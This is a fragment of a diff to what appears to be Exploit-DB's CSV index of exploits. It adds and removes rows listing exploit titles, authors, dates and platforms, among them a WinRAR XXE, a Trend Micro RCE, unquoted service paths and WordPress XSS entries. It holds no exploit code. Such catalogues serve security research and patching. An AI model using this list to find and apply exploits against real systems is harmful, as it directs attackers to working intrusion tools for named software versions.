id,file,description,date,author,type,platform,port 47521,exploits/windows/local/47521.txt,"BlackMoon FTP Server 3.1.2.1731 - 'BMFTP-RELEASE' Unquoted Serive Path",2019-10-17,"Debashis Pal",local,windows, 47522,exploits/windows/local/47522.txt,"Web Companion versions 5.1.1035.1047 - 'WCAssistantService' Unquoted Service Path",2019-10-17,"Debashis Pal",local,windows, 47523,exploits/windows/local/47523.txt,"WorkgroupMail 7.5.1 - 'WorkgroupMail' Unquoted Service Path",2019-10-17,cakes,local,windows, +47526,exploits/xml/local/47526.txt,"winrar 5.80 - XML External Entity Injection",2019-10-21,alblalawi,local,xml, +47527,exploits/windows/local/47527.txt,"Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution",2019-10-21,hyp3rlinx,local,windows, +47529,exploits/solaris/local/47529.txt,"Solaris 11.4 - xscreensaver Privilege Escalation",2019-10-21,"Marco Ivaldi",local,solaris, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -41844,7 +41849,6 @@ id,file,description,date,author,type,platform,port 47498,exploits/php/webapps/47498.txt,"Kirona-DRS 5.5.3.5 - Information Disclosure",2019-10-14,Ramikan,webapps,php, 47501,exploits/php/webapps/47501.txt,"Bolt CMS 3.6.10 - Cross-Site Request Forgery",2019-10-15,r3m0t3nu11,webapps,php, 47505,exploits/php/webapps/47505.txt,"Accounts Accounting 7.02 - Persistent Cross-Site Scripting",2019-10-16,"Debashis Pal",webapps,php, -47512,exploits/linux/webapps/47512.txt,"CyberArk Password Vault 10.6 - Authentication Bypass",2019-10-16,"Daniel Martinez Adan",webapps,linux, 47516,exploits/php/webapps/47516.txt,"Wordpress FooGallery 1.8.12 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php, 47517,exploits/php/webapps/47517.txt,"Wordpress Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php, 47518,exploits/php/webapps/47518.txt,"Wordpress Popup Builder 3.49 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,